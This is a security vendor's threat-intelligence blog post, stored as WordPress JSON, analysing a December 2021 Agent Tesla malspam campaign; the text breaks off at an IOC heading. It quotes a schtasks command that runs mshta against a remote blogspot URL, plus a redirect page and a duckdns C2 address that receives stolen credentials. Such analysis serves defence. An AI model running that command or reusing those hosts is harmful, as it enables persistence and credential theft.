{"id":4174,"date":"2021-12-06T15:02:14","date_gmt":"2021-12-06T15:02:14","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=4174"},"modified":"2026-06-08T14:54:09","modified_gmt":"2026-06-08T14:54:09","slug":"agent-tesla-malware-campaign-december-2021","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/agent-tesla-malware-campaign-december-2021\/","title":{"rendered":"Agent Tesla \u2014 December 6, 2021 malware campaign"},"content":{"rendered":"\n

Agent Tesla<\/strong> is a spyware<\/strong> that exfiltrates information from victim systems by capturing keystrokes and user actions (T1056.001<\/code> \u2014 Keylogging). Built on the .NET framework<\/strong>, it transmits stolen data to a command-and-control (C2) server. Agent Tesla extracts credentials and stored data from web browsers<\/strong>, email clients<\/strong>, and FTP clients<\/strong> (T1555.003<\/code> \u2014 Credentials from Web Browsers, T1552.001<\/code> \u2014 Credentials in Files). The malware bundles antivirus evasion<\/strong> and persistence<\/strong> mechanisms, ensuring it survives a system reboot.<\/p>\n\n\n\n

In recent days we observed a new malspam<\/strong> campaign delivering this family. The lure email instructs the recipient to download and open the attached document.<\/p>\n\n\n

\n
\"\"<\/figure>\n<\/div>\n\n\n

The attached .doc<\/code> file leverages mshta.exe<\/code> (T1218.005<\/code> \u2014 Mshta) to reach the domain https:\/\/bitly[.]com\/asdqwdwdsfvcxvccv<\/code>, which serves the following HTML redirect:<\/p>\n\n\n\n

<html>\n<head><title>Bitly<\/title><\/head>\n<body><a href=\"https:\/\/sqlserviceazure.blogspot[.]com\/p\/bathindasboba[.]html\">moved here<\/a><\/body>\n<\/html><\/code><\/pre>\n\n\n\n
After several staged downloads, a scheduled task<\/strong> is created via the following command (T1053.005<\/code> \u2014 Scheduled Task):<\/p>\n\n\n\n
\"C:\\Windows\\System32\\schtasks.exe\" \/create \/sc MINUTE \/mo 80 \/tn \"\"Bluefibonashi\"\" \/F \/tr \"\"\"\"\\\"\"\"\"MsHtA\"\"\"\"\\\"\"\"\"http:\/\/1230948%1230948@sqlserverserviceagent.blogspot.com\/p\/justtheback.html\\\"\"\"\"<\/code><\/pre>\n\n\n\n
Concurrently, the Agent Tesla payload is downloaded and executed via PowerShell (T1059.001<\/code> \u2014 PowerShell). The implant then beacons to its C2 by issuing HTTP POST<\/strong> requests to http:\/\/microsoftazyresql.duckdns.org\/j\/p29oa\/mawa\/eae7bc3b675ad7042607.php<\/code> (T1071.001<\/code> \u2014 Web Protocols).<\/p>\n\n\n\n
Agent Tesla is, at its core, a keylogger and data stealer<\/strong>: credentials harvested from major browsers, configuration files, and credentials for VPN clients, FTP clients, and mail clients are systematically targeted. Tracking the C2 infrastructure, malspam lures, and operator tradecraft for commodity stealers like Agent Tesla is the daily work of our Cyber Threat Intelligence<\/a>.<\/p>\n\n\n\n
IOC<\/strong><\/p>\n\n\n\n
DOC file:<\/p>\n\n\n\n